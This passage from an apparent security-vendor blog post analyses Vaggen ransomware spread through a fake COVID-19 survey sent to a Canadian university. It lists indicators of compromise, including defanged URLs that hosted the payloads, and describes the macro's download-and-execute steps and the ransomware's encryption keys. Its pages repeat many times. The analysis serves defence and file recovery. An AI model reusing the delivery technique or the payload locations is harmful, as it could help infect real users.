3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2956 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2957 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2958 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2959 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2960 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2961 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2962 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2963 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2964 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document and letting the macro run triggers a request to canarytokens.com, which notifies the owner of the token. Canary tokens are normally a defensive tool: you plant one where only an intruder would touch it, and the alert is an early warning that someone has had access to the network. Here the attacker uses the same service in reverse, most likely to count how many people opened the document and perhaps where they are from; because the macro requests a different token depending on whether its payload launched, it also learns how many of those opens actually ran the executable.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, whose entry point is the function denoted ‘main_main’. Other functions belonging to the main package carry obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA; several of them are Swedish words (SPRINGA is “run”, DUVETVAD is “you know what”). Three of them map to their purpose as follows:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (for example the content of the ransom note) are protected with XXTEA, via the xxtea-go library. Each protected string is stored Base64-encoded; at runtime it is Base64-decoded and then XXTEA-decrypted with the hardcoded key “STALKER”. At the end of the execution, the ransom note is dropped on the Desktop.
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2967 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2968 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2969 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2970 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2971 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2972 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2973 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2974 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2975 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2976 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2977 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2978 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2979 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2980 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2981 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2982 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2983 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2984 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2985 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2986 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2987 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2988 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2989 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2990 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2991 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
